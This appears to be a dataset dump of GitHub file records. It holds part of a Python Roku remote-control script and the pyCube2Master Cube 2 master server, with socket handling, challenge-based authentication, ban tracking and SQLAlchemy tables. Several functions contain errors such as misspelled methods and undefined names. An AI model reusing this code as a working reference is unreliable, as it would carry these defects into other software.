'/launch/tvinput.dtv?ch=6.1')\n exit_status = 1\n\n elif action == \"5\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=10.1')\n exit_status = 1\n\n elif action == \"6\":\n r = requests.post(roku_url + '/launch/tvinput.dtv?ch=28.1')\n exit_status = 1\n\n elif action == \"7\":\n r = requests.post(roku_url + '/launch/12')\n exit_status = 1\n\n elif action == \"8\":\n r = requests.post(roku_url + '/launch/2285')\n exit_status = 1\n\n elif action == \"9\":\n r = requests.post(roku_url + '/launch/837')\n exit_status = 1\n\n elif action == \"80\":\n r = requests.get(roku_url + '/query/apps')\n\n mydoc = minidom.parseString(r.content)\n items = mydoc.getElementsByTagName('app')\n\n # Print all Roku Apps\n print('\\nRoku Apps Installed:')\n for elem in items:\n print(elem.firstChild.data)\n\n print \"\\n\"\n\n exit_status = 1\n\n elif action == \"99\":\n exit(0)\n\n else:\n print \"Invalid option. Try again \\n\"\n exit_status = 1\n\n main()\n\nif __name__ == \"__main__\":\n main()\n\n\n" }, { "alpha_fraction": 0.6941580772399902, "alphanum_fraction": 0.7422680258750916, "avg_line_length": 19.85714340209961, "blob_id": "9f862bc63c37479d0869b09a8fd191f7ca239a7e", "content_id": "f97cd156321accbacbb927ee04366291c5359a2e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 56, "num_lines": 14, "path": "/testing/list-channels.py", "repo_name": "dcantor/roku", "src_encoding": "UTF-8", "text": "from xml.dom import minidom\nimport requests\n\n\n\nr = requests.get('http://192.168.50.70:8060/query/apps')\nmydoc = minidom.parseString(r.content)\nprint mydoc\nitems = mydoc.getElementsByTagName('app')\n\n# all items data\nprint('\\nAll item data:')\nfor elem in items:\n print(elem.firstChild.data)" } ]
2
Hasv07/Anime_Notebook
https://github.com/Hasv07/Anime_Notebook
c765a615c49d7db35dd1523d31ccade676ae8764
baf5c52b6bbe31ac50626b9c2b238db0921001d0
8fe08a629d9037f4ce14d58166e8a181a012f01a
refs/heads/master
2023-01-28T13:41:11.522112
2020-12-03T18:58:57
2020-12-03T18:58:57
318,287,636
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.8365384340286255, "alphanum_fraction": 0.8365384340286255, "avg_line_length": 33.66666793823242, "blob_id": "c65e77be2103b6a8db648b7161b4860b85c6941e", "content_id": "f388e101be121e3ce9aae316dbc7b601f1c219c6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 104, "license_type": "no_license", "max_line_length": 86, "num_lines": 3, "path": "/README.md", "repo_name": "Hasv07/Anime_Notebook", "src_encoding": "UTF-8", "text": "#Anime_Notebook\n\nMobile Application which you can add your Favourite Anime Information,Trailer And AMVs\n" }, { "alpha_fraction": 0.6403940916061401, "alphanum_fraction": 0.6453201770782471, "avg_line_length": 24.5, "blob_id": "22d11466e64d632b95713e8255f5539e9b9c9836", "content_id": "39768caac498a276aaf31bb0062c613ce12c5916", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 203, "license_type": "no_license", "max_line_length": 40, "num_lines": 8, "path": "/assets/json/with.py", "repo_name": "Hasv07/Anime_Notebook", "src_encoding": "UTF-8", "text": "import json\nnames=[]\nwith open(\"anime.json\",'r') as handle:\n x= json.load(handle)\n names = [data['name'] for data in x]\nwith open(\"anime.json\",'w+') as handle:\n\n json.dump(names,handle,indent=4)" } ]
2
MorganBorman/pyCube2Master
https://github.com/MorganBorman/pyCube2Master
e3b1fdfd0b940f43c137d7563b0c4fd9b07edf31
29105f1e0822f24f8cc4c84537c8c79aa5594d0e
121d0d74f7f40c341c025272c4afdbf322c739ce
refs/heads/master
2016-09-05T09:03:19.587579
2012-07-08T08:57:51
2012-07-08T08:57:51
4,027,356
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6382730603218079, "alphanum_fraction": 0.6394398808479309, "avg_line_length": 29.625, "blob_id": "129ef7b8842737dfaf278a2cd25e6cf821604498", "content_id": "4031563707867df671578a2ca90f6d006f28e237", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1714, "license_type": "no_license", "max_line_length": 115, "num_lines": 56, "path": "/src/DatabaseManager.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "import CategoryConfig, sqlalchemy\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom contextlib import contextmanager\n\ndef get_database_uri():\n config_path = \"../\"\n config_category = \"database\"\n config_extension = \".conf\"\n \n config_object = CategoryConfig.CategoryConfig(config_path, config_category, config_extension)\n \n #place the database by default in the instances directory\n default_db_path = \"sqlite:///../pyCube2Master.db\"\n \n doc = 'Sqlalchemy uri string indicating the database connection parameters.'\n return config_object.getOption('database.uri', default_db_path, doc)\n\n\nclass DatabaseManager():\n def __init__(self):\n self.is_connected = False\n self.uri = get_database_uri()\n self.engine = None\n self.session_factory = None\n self.Base = declarative_base()\n \n def connect(self):\n if not self.is_connected:\n self.engine = sqlalchemy.create_engine(self.uri)\n self.session_factory = sqlalchemy.orm.sessionmaker(bind=self.engine, autocommit=False, autoflush=False)\n self.is_connected = True\n \n def initialize_tables(self):\n self.connect()\n self.Base.metadata.create_all(self.engine)\n \n def get_session(self):\n try:\n self.engine.execute(\"SELECT 1;\")\n except:\n del self.session_factory\n del self.engine\n self.is_connected = False\n self.connect()\n\n return self.session_factory()\n \ndatabase_manager = DatabaseManager()\n\n@contextmanager\ndef Session():\n session = database_manager.get_session()\n try:\n yield session\n finally:\n session.close()" }, { "alpha_fraction": 0.6293706297874451, "alphanum_fraction": 0.6293706297874451, "avg_line_length": 46.733333587646484, "blob_id": "8c5077568e909534a9b743f0206c7f2fd4493ed8", "content_id": "287106dfe822f4cf45c2a09d1538ea9136b93ce2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 715, "license_type": "no_license", "max_line_length": 98, "num_lines": 15, "path": "/src/BaseTables/CaptureEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass CaptureEvent(database_manager.Base):\n __tablename__ = table_names['CaptureEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n \n start = Column(DateTime, nullable=False)\n end = Column(DateTime, nullable=False)\n team = Column(SmallInteger, nullable=True)\n complete = Column(Boolean, nullable=False)\n health = Column(Integer, nullable=False)" }, { "alpha_fraction": 0.7108433842658997, "alphanum_fraction": 0.7831325531005859, "avg_line_length": 26.33333396911621, "blob_id": "040bdbb8f8618e7ae3036a086fa6a8ae1c589fb9", "content_id": "c91e4c397d9c89722a33255b4cdc6e43ed350c6b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 83, "license_type": "no_license", "max_line_length": 46, "num_lines": 3, "path": "/src/main.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\nfrom Controller import Controller\n\ncontroller = Controller('localhost', 28787, 5)\n" }, { "alpha_fraction": 0.5101317167282104, "alphanum_fraction": 0.5126646161079407, "avg_line_length": 28, "blob_id": "00af7f300327fef304ab4a40069192157c2147fc", "content_id": "d22a0835f6705f8990d7aa8bc73ae0bba5531108", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1974, "license_type": "no_license", "max_line_length": 98, "num_lines": 68, "path": "/src/AuthenticationModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Signals import SignalObject, Signal\n\nimport random\nimport cube2crypto\n\nfrom BaseTables import User, UserName\n\nclass AuthenticationModel(SignalObject):\n\n challenge = Signal\n accept = Signal\n deny = Signal\n\n def __init__(self):\n SignalObject.__init__(self)\n \n #key = (client, authid)\n #value = {'user': user, 'answer': answer}\n self.pending_auths = {}\n \n self.name_list = \"\"\n self.name_list_dirty = True\n \n def request_authentication(self, client, authid, email):\n \n user = User.by_email(email)\n \n if user is None:\n self.deny(authid)\n return\n \n pubkey = user.pubkey\n \n challenge, answer = cube2crypto.genchallenge(pubkey, format(random.getrandbits(128), 'X'))\n \n self.pending_auths[(client, authid)] = {'user': user, 'answer': answer}\n \n self.challenge.emit(client, authid, challenge)\n \n def confirm_authentication(self, client, authid, answer):\n \n if not (client, authid) in self.pending_auths.keys():\n self.deny.emait(client, authid)\n return\n \n pending_auth = self.pending_auths[(client, authid)]\n user = pending_auth['user']\n \n if answer != pending_auth['answer']:\n self.deny.emait(client, authid)\n else:\n self.accept.emit(client, \n authid, \n user.id, \n user.group_list,\n user.name_list)\n \n def get_name_list(self):\n if self.name_list_dirty:\n name_list_list = []\n \n for name in UserName.all_names():\n name_list_list.append(\"na %s\\n\" % name)\n \n self.name_list = \"\".join(name_list_list)\n self.name_list_dirty = False\n \n return self.name_list\n\n\n" }, { "alpha_fraction": 0.5946816802024841, "alphanum_fraction": 0.5954875349998474, "avg_line_length": 43.28571319580078, "blob_id": "feed7b364718bc9948b52763dbf262a7c7dd05dc", "content_id": "a245d577c0db89efdc154deb401a76c05c96cd6f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1241, "license_type": "no_license", "max_line_length": 62, "num_lines": 28, "path": "/src/BaseTables/TableNames.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "prefix = \"pycube2master_\"\n\ntable_names = {}\n\ntable_names['ActivitySpan'] = 'activity_spans'\ntable_names['CaptureEvent'] = 'capture_events'\ntable_names['DamageDealtEvent'] = 'damage_dealt_events'\ntable_names['DeathEvent'] = 'death_events'\ntable_names['FragEvent'] = 'frag_events'\ntable_names['Game'] = 'games'\ntable_names['GameVersion'] = 'game_versions'\ntable_names['Gun'] = 'guns'\ntable_names['Match'] = 'matches'\ntable_names['Mode'] = 'modes'\ntable_names['PseudoMode'] = 'pseudo_modes'\ntable_names['PunitiveEffect'] = 'punitive_effects'\ntable_names['PunitiveEffectType'] = 'punitive_effect_types'\ntable_names['ServerDomain'] = 'server_domains'\ntable_names['ServerInstance'] = 'server_instances'\ntable_names['ServerMod'] = 'server_mods'\ntable_names['ShotEvent'] = 'shot_events'\ntable_names['User'] = 'users'\ntable_names['UserGroup'] = 'user_groups'\ntable_names['UserGroupMembership'] = 'user_group_memberships'\ntable_names['UserName'] = 'user_names'\n\nfor key in table_names.keys():\n table_names[key] = prefix + table_names[key]\n\n" }, { "alpha_fraction": 0.5666462182998657, "alphanum_fraction": 0.5684889554977417, "avg_line_length": 30.60194206237793, "blob_id": "b64acf8ad2e6930e571121c4515c26e089efc43e", "content_id": "1d920c98e31b9b3e244a1de1c0dc80a9c1838d25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3256, "license_type": "no_license", "max_line_length": 124, "num_lines": 103, "path": "/src/ServersModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\"\"\"Represents the body of the server list data.\"\"\"\n\nfrom Signals import SignalObject, Signal\nimport time\nimport cube2crypto\nimport random\n\nfrom BaseTables import ServerDomain, ServerInstance\n\nclass ServersModel(SignalObject):\n\n challenge = Signal\n accept = Signal\n deny = Signal\n\n def __init__(self):\n SignalObject.__init__(self)\n \n self.server_list = \"\"\n self.server_list_dirty = True\n \n #key = client\n #value = (port, time, server_domain, answer)\n self.servers_pending = {}\n \n #key = client\n #value = (port, time, server_domain)\n self.servers = {}\n \n def register_server(self, client, server_domain, port):\n \"Attempt to register a newly connected server_domain.\"\n \n if client in self.servers.keys():\n self.servers[client]['time'] = time.time()\n return\n \n server_domain = ServerDomain.by_domain(server_domain)\n \n if server_domain is None:\n self.deny.emit(client)\n return\n \n pubkey = server_domain.pubkey\n \n challenge, answer = cube2crypto.genchallenge(pubkey, format(random.getrandbits(128), 'X'))\n \n self.servers_pending[client] = {'port': port, 'time': time.time(), 'server_domain': server_domain, 'answer': answer}\n \n self.challenge.emit(client, challenge)\n \n def confirm_server(self, client, answer):\n \"Confirm a connected servers authentication.\"\n if not client in self.servers_pending.keys():\n self.deny.emit(client)\n return\n \n data = self.servers_pending[client]\n del self.servers_pending[client]\n \n if data['answer'] != answer:\n self.deny.emit(client)\n return\n \n del data['answer']\n \n self.servers[client] = data\n self.server_list_dirty = True\n self.accept.emit(client)\n \n def is_server_confirmed(self, client):\n \"Check whether the specified server has been confirmed.\"\n return client in self.servers.keys()\n \n def remove_server(self, client):\n \"Removed the specified server from the list.\"\n if client in self.servers.keys():\n del self.servers[client]\n self.server_list_dirty = True\n \n if client in self.servers_pending.keys():\n del self.servers_pending[client]\n \n def refresh(self):\n \"Look for servers which have timed out.\"\n pass\n \n def get_server_list(self):\n \"Get the current list of servers.\"\n if self.server_list_dirty:\n server_list_list = []\n for client, data in self.servers.items():\n server_ip = client.address[0]\n server_port = data['port']\n server_list_list.append(\"addserver %s %s\\n\" %(server_ip, server_port))\n self.server_list = \"\".join(server_list_list)\n self.server_list_dirty = False\n \n return self.server_list\n \n def broadcast(self, data):\n \"Send a message to all confirmed servers.\"\n for client in self.servers.keys():\n client.send(data)\n\n" }, { "alpha_fraction": 0.8787878751754761, "alphanum_fraction": 0.8787878751754761, "avg_line_length": 30.719999313354492, "blob_id": "d762bc06529f1cf47560f27f242578827cc42258", "content_id": "e744c84d624f3605228fd84f5438333d83aff894", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 792, "license_type": "no_license", "max_line_length": 51, "num_lines": 25, "path": "/src/BaseTables/__init__.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import database_manager\n\nfrom User import User\nfrom UserGroup import UserGroup\nfrom UserName import UserName\nfrom UserGroupMembership import UserGroupMembership\nfrom ActivitySpan import ActivitySpan\nfrom CaptureEvent import CaptureEvent\nfrom DamageDealtEvent import DamageDealtEvent\nfrom DeathEvent import DeathEvent\nfrom FragEvent import FragEvent\nfrom Game import Game\nfrom GameVersion import GameVersion\nfrom Gun import Gun\nfrom Match import Match\nfrom Mode import Mode\nfrom PseudoMode import PseudoMode\nfrom PunitiveEffectType import PunitiveEffectType\nfrom PunitiveEffect import PunitiveEffect\nfrom ServerDomain import ServerDomain\nfrom ServerInstance import ServerInstance\nfrom ServerMod import ServerMod\nfrom ShotEvent import ShotEvent\n\ndatabase_manager.initialize_tables()" }, { "alpha_fraction": 0.6492146849632263, "alphanum_fraction": 0.6492146849632263, "avg_line_length": 46.83333206176758, "blob_id": "512347b364335ecac096987c88ed5cb439d9726f", "content_id": "b44909d2e43e3de34503c1ccb9a92646d1a344fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 573, "license_type": "no_license", "max_line_length": 98, "num_lines": 12, "path": "/src/BaseTables/ShotEvent.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass ShotEvent(database_manager.Base):\n __tablename__ = table_names['ShotEvent']\n id = Column(BigInteger, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n match_id = Column(BigInteger, ForeignKey(table_names['Match']+'.id'), nullable=False)\n who = Column(BigInteger, ForeignKey(table_names['User']+'.id'), nullable=False)\n gun = Column(SmallInteger, ForeignKey(table_names['Gun']+'.id'), nullable=False)\n \n when = Column(DateTime, nullable=False)" }, { "alpha_fraction": 0.5693683624267578, "alphanum_fraction": 0.5721065998077393, "avg_line_length": 34.74509811401367, "blob_id": "7b7b9a317a338b6decfd35f1bcd50cc994c92e81", "content_id": "0a3df7c6950cbf29075ba2e5a078412431dfdf56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5478, "license_type": "no_license", "max_line_length": 98, "num_lines": 153, "path": "/src/Controller.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from AuthenticationModel import AuthenticationModel\nfrom ServersModel import ServersModel\nfrom PunitiveModel import PunitiveModel\nfrom StatsModel import StatsModel\nfrom SocketManager import SocketManager\n\nclass Controller(object):\n def __init__(self, master_ip, master_port, max_clients):\n \n self.authentication_model = AuthenticationModel()\n self.servers_model = ServersModel()\n self.punitive_model = PunitiveModel()\n self.stats_model = StatsModel()\n self.socket_manager = SocketManager(master_ip, master_port, max_clients)\n \n #######################################\n #connect up our signals\n #######################################\n \n #SocketManager\n \n self.socket_manager.started.connect(self.on_started)\n self.socket_manager.stopped.connect(self.on_stopped)\n self.socket_manager.connect.connect(self.on_connect)\n self.socket_manager.request.connect(self.on_request)\n self.socket_manager.disconnect.connect(self.on_disconnect)\n \n #ServersModel\n \n self.servers_model.challenge.connect(self.on_challenge)\n self.servers_model.accept.connect(self.on_accept)\n self.servers_model.deny.connect(self.on_deny)\n \n #AuthenticationModel\n \n self.authentication_model.challenge.connect(self.on_auth_challenge)\n self.authentication_model.accept.connect(self.on_auth_accept)\n self.authentication_model.deny.connect(self.on_auth_deny)\n \n #PunitiveModel\n \n self.punitive_model.update.connect(self.on_punitive_effect_update)\n self.punitive_model.remove.connect(self.on_punitive_effect_remove)\n \n #######################################\n #start up the socket_manager\n #######################################\n \n self.socket_manager.run()\n \n def on_started(self, ip, port):\n print \"Master server started.\"\n print \"Listening on (%s, %s).\" %(str(ip), str(port))\n print \"Press Ctrl-c to exit.\"\n \n def on_stopped(self):\n print \"\\nMaster server stopped.\"\n \n def on_connect(self, client):\n print \"client connected %s\" % str(client.address)\n \n def on_request(self, client, data):\n print \"client request %s:\" % str(client.address), data\n \n \"\"\"\n #inbound messages\n \n list = list servers\n sr = server registration\n sc = server confirmation\n \n ar = authentication request\n ac = authentication confirmation\n \n eu = effect update\n er = effect remove\n \n sd = stats data\n \n #outbound messages\n \n rc = registration challenge\n rs = registration success\n rf = registration failure\n \n ac = authentication challenge\n as = authentication success\n af = authentication failure\n \n na = names add\n nr = names remove\n \n eu = effect update\n er = effect remove\n \"\"\"\n \n if data[0] == \"list\":\n servers_list = self.servers_model.get_server_list()\n client.send(servers_list)\n if data[0] == \"sr\":\n self.servers_model.register_server(client, data[1], data[2])\n elif data[0] == \"sc\":\n self.servers_model.confirm_server(client, data[1])\n elif not self.servers_model.is_server_confirmed(client):\n client.disconnect()\n return\n else:\n if data[0] == \"ar\":\n self.authentication_model.request_authentication(client, data[1], data[2])\n elif data[0] == \"ac\":\n self.authentication_model.confirm_authentication(client, data[1], data[2])\n elif data[0] == \"ec\":\n self.punitive_model.create_effect(client, *data[1:])\n elif data[0] == \"sd\":\n self.punitive_model.add_data(client, data)\n \n def on_disconnect(self, client):\n print \"client disconnected %s\" % str(client.address)\n \n def on_challenge(self, client, challenge):\n message = \"rc %s\\n\" % challenge\n client.send(message)\n \n def on_accept(self, client):\n client.unlimit()\n effect_list = self.punitive_model.get_effect_list()\n names_list = self.authentication_model.get_name_list()\n message = \"\".join((\"rs\\n\", effect_list, names_list))\n client.send(message)\n \n def on_deny(self, client):\n client.send(\"rf\\n\")\n client.disconnect()\n \n def on_auth_challenge(self, client, authid, challenge):\n message = \"ac %s %s\\n\" % (authid, challenge)\n client.send(message)\n \n def on_auth_accept(self, client, authid, userid, groups, names):\n message = \"as %d %d %s %s\\n\" % (authid, userid, ','.join(groups), ','.join(names))\n client.send(message)\n \n def on_auth_deny(self, client, authid):\n message = \"af %s\\n\" % authid\n client.send(message)\n \n def on_punitive_effect_update(self, effect_id, effect_type, target_ip, target_mask, reason):\n message = \"eu %d %d %s %s %s\\n\" % (effect_id, effect_type, target_ip, target_mask, reason)\n self.servers_model.broadcast(message)\n \n def on_punitive_effect_remove(self, effect_id):\n message = \"er %d\\n\" % effect_id\n self.server_model.broadcast(message)\n \n" }, { "alpha_fraction": 0.526099681854248, "alphanum_fraction": 0.5319648385047913, "avg_line_length": 30.58333396911621, "blob_id": "a2e1a1b4a62450e7be3d00a23dba12704745bd35", "content_id": "0e529e3f26336b7cc57d0147a0d98f695bba557a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3410, "license_type": "no_license", "max_line_length": 82, "num_lines": 108, "path": "/src/SocketManager.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "import socket\nimport select\nimport time\n\nfrom Signals import SignalObject, Signal\n\nclass MasterClient(object):\n def __init__(self, socket_manager, sock, address):\n self.socket_manager = socket_manager\n self.address = address\n self.socket = sock\n \n #limit the buffer to 128 characters until they have been authenticated\n self.buffer_limit = 128\n \n self.buffer = \"\"\n \n def unlimit(self):\n self.buffer_limit = -1\n \n def send(self, datum):\n self.socket.send(datum)\n \n def disconnect(self):\n self.socket_manager.handle_disconnect(self.socket)\n self.socket_manager.disconnect.emit(self)\n self.socket.close()\n \n def handle(self):\n data = self.socket.recv(1024)\n if len(data) <= 0:\n self.disconnect()\n return\n self.buffer += data\n \n if self.buffer_limit != -1 and len(self.buffer) > self.buffer_limit:\n self.disconnect()\n return\n \n next_nl_pos = self.buffer.find(\"\\n\")\n while next_nl_pos != -1:\n datum, self.buffer = self.buffer.split('\\n', 1)\n self.handle_datum(datum)\n next_nl_pos = self.buffer.find(\"\\n\")\n \n def handle_datum(self, datum):\n datum = datum.split()\n self.socket_manager.request.emit(self, datum)\n\nclass SocketManager(SignalObject):\n \n started = Signal\n stopped = Signal\n update = Signal\n connect = Signal\n request = Signal\n disconnect = Signal\n\n def __init__(self, master_ip, master_port, max_clients):\n SignalObject.__init__(self)\n \n self.master_clients = {}\n \n self.master_ip = master_ip\n self.master_port = master_port\n \n self.running = True\n self.interval = 3800\n self.next_update = time.time() + self.interval\n \n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind((master_ip, master_port))\n self.socket.listen(max_clients)\n \n def run(self):\n self.started.emit(self.master_ip, self.master_port)\n try:\n while self.running:\n if time.time() >= self.next_update:\n self.update.emit()\n self.next_update = time.time() + self.interval\n \n wait_time = self.next_update - time.time()\n \n wait_devs = [self.socket] + self.master_clients.keys()\n \n try:\n rfds, wfds, efds = select.select(wait_devs, [], [], wait_time)\n \n for rfd in rfds:\n if rfd == self.socket:\n self.handle_connect()\n else:\n self.master_clients[rfd].handle()\n \n except select.error:\n pass\n except KeyboardInterrupt:\n self.stopped.emit()\n \n def handle_connect(self):\n sock, address = self.socket.accept()\n self.master_clients[sock] = MasterClient(self, sock, address)\n self.connect.emit(self.master_clients[sock])\n\n def handle_disconnect(self, sock):\n del self.master_clients[sock]" }, { "alpha_fraction": 0.526868462562561, "alphanum_fraction": 0.526868462562561, "avg_line_length": 40.512821197509766, "blob_id": "178e934d7c7b5ffa5a070b1237ea335529a8d81b", "content_id": "25b26aa1bab52e1c728f6ffc689e2a0de2cfded5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3238, "license_type": "no_license", "max_line_length": 201, "num_lines": 78, "path": "/src/PunitiveModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "\"\"\"Clients only keep the current list of active effects.\"\"\"\n\nimport datetime\nfrom Signals import SignalObject, Signal\n\nfrom DatabaseManager import Session\n\nfrom BaseTables import PunitiveEffect, PunitiveEffectType\n\nclass PunitiveModel(SignalObject):\n\n update = Signal\n remove = Signal\n\n def __init__(self):\n SignalObject.__init__(self)\n \n self.effect_list = \"\"\n self.effect_list_dirty = True\n \n def create_effect(self, server, effect_type_name, target_id, target_name, target_ip, target_mask, \n master_id, master_name, master_ip, reason):\n \"\"\"Create an entry for a new specified punitive effect.\"\"\"\n \n effect_type = EffectType.by_name(effect_type_name)\n \n if effect_type is None:\n return\n \n self.effects[effect_id] = PunitiveEffect( effect_type, \n target_id, \n target_name, \n target_ip, \n target_mask, \n master_id, \n master_name, \n master_ip, \n reason)\n \n self.effect_list_dirty = True\n self.update.emit(effect_id, effect_type.name, target_ip, target_mask, reason)\n \n def remove_effect(self, effect_id):\n if PunitiveEffect.expire(effect_id):\n self.effect_list_dirty = True\n self.remove.emit(effect_id)\n \n def get_effect_list(self):\n if self.effect_list_dirty:\n effect_list_list = []\n \n with Session() as session:\n punitive_effect_query = session.query(PunitiveEffect.id, PunitiveEffect.effect_type, PunitiveEffect.expired, PunitiveEffect.target_ip, PunitiveEffect.target_mask, PunitiveEffect.reason)\n rows = punitive_effect_query.filter(PunitiveEffect.expired==False).all()\n \n for effect_id, effect_type, expired, target_ip, target_mask, reason in rows:\n effect_type_name = effect_type.name\n effect_val = \"ue %ld %s %ld %ld %s\\n\" % (effect_id, effect_type_name, target_ip, target_mask, reason)\n effect_list_list.append(effect_val)\n \n self.effect_list = \"\".join(effect_list_list)\n self.effect_list_dirty = False\n \n return self.effect_list\n \n def refresh(self):\n \"Look for those effects which have expired and send out remove signals.\"\n with Session() as session:\n punitive_effect_query = session.query(PunitiveEffect)\n punitive_effect_query = PunitiveEffect.expired(punitive_effect_query)\n \n expired_punitive_effects = punitive_effect_query.all()\n \n for punitive_effect in expired_punitive_effects:\n punitive_effect.expired = True\n self.remove.emit(punitive_effect.id)\n \n session.commit()\n" }, { "alpha_fraction": 0.6979472041130066, "alphanum_fraction": 0.7008797526359558, "avg_line_length": 33.150001525878906, "blob_id": "f620c53ea9849913caa55d57413546a44a55012c", "content_id": "f1d42c6a841719e8a07879ba1789ec263a2028b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 682, "license_type": "no_license", "max_line_length": 73, "num_lines": 20, "path": "/src/BaseTables/Common.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from DatabaseManager import database_manager, Session\n\nfrom sqlalchemy import or_\nfrom sqlalchemy import SmallInteger, Integer, BigInteger, String, Boolean\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import Column, Sequence, ForeignKey\n\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\nfrom sqlalchemy.orm import relation, mapper, relationship, backref\nfrom sqlalchemy.schema import UniqueConstraint\n\nclass enum(object):\n def __init__(self, *items, **kwitems):\n i = 0\n for item in items:\n self.__setattr__(item, i)\n i += 1\n \n for item, value in kwitems.items():\n self.__setattr__(item, value)" }, { "alpha_fraction": 0.6745152473449707, "alphanum_fraction": 0.6745152473449707, "avg_line_length": 41.52941131591797, "blob_id": "32378ecbb430889c9fd29b0a6da5b55010cb77c9", "content_id": "887d35e582f4ab382d0b9b4e90bd2078213709a2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "no_license", "max_line_length": 90, "num_lines": 17, "path": "/src/BaseTables/UserGroupMembership.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass UserGroupMembership(database_manager.Base):\n __tablename__ = table_names['UserGroupMembership']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n user_id = Column(Integer, ForeignKey(table_names['User']+'.id'), nullable=False)\n group_id = Column(Integer, ForeignKey(table_names['UserGroup']+'.id'), nullable=False)\n \n UniqueConstraint(user_id, group_id, name=__tablename__+'_uq_user_id_group_id')\n \n user = relationship('User', back_populates=\"group_memberships\")\n group = relationship('UserGroup')\n \n def __init__(self, user_id, group_id):\n self.user_id = user_id\n self.name = group_id" }, { "alpha_fraction": 0.6274510025978088, "alphanum_fraction": 0.6318082809448242, "avg_line_length": 40.818180084228516, "blob_id": "3764a3efdd0895ff54bb3a4aabbe5c6f59dd34d7", "content_id": "be2eb8881b4613f0d4307b2e0a229a3b948711fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 459, "license_type": "no_license", "max_line_length": 107, "num_lines": 11, "path": "/src/BaseTables/PseudoMode.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Common import *\nfrom TableNames import table_names\n\nclass PseudoMode(database_manager.Base):\n __tablename__ = table_names['PseudoMode']\n id = Column(Integer, Sequence(__tablename__+'_id_seq'), primary_key=True)\n \n mod_id = Column(Integer, ForeignKey(table_names['ServerMod']+'.id'), nullable=False)\n \n name = Column(String(32), nullable=False)\n number = Column(SmallInteger, nullable=False)" }, { "alpha_fraction": 0.7807999849319458, "alphanum_fraction": 0.7807999849319458, "avg_line_length": 33.72222137451172, "blob_id": "49dd9f9f4dac707f3720f5f8622150ded5d883c9", "content_id": "8e1e6d81aa252b700b7795059c9b983184408d23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 625, "license_type": "no_license", "max_line_length": 91, "num_lines": 18, "path": "/src/StatsModel.py", "repo_name": "MorganBorman/pyCube2Master", "src_encoding": "UTF-8", "text": "from Signals import SignalObject, Signal\n\nfrom DatabaseManager import database_manager, Session\nfrom sqlalchemy import or_\nfrom sqlalchemy import Column, SmallInteger, Integer, BigInteger, String, Boolean, DateTime\nfrom sqlalchemy import Sequence, ForeignKey\nfrom sqlalchemy.orm.exc import NoResultFound, MultipleResultsFound\nfrom sqlalchemy.orm import relation, mapper, relationship, backref\nfrom sqlalchemy.schema import UniqueConstraint\n\ndatabase_manager.initialize_tables()\n\nclass StatsModel(SignalObject):\n def __init__(self):\n SignalObject.__init__(self)\n \n def add_data(client, data):\n pass\n" }, { "alpha_fraction": 0.6584615111351013, "alphanum_fraction": 0.6646153926849365, "avg_line_length": 31.600000381469727, "blob_id": "4b8a429de843565d9920368bca5c9a465ace87cd", "content_id": "5cc26cde26c78a9eb966f0f87b796926b6df0838", 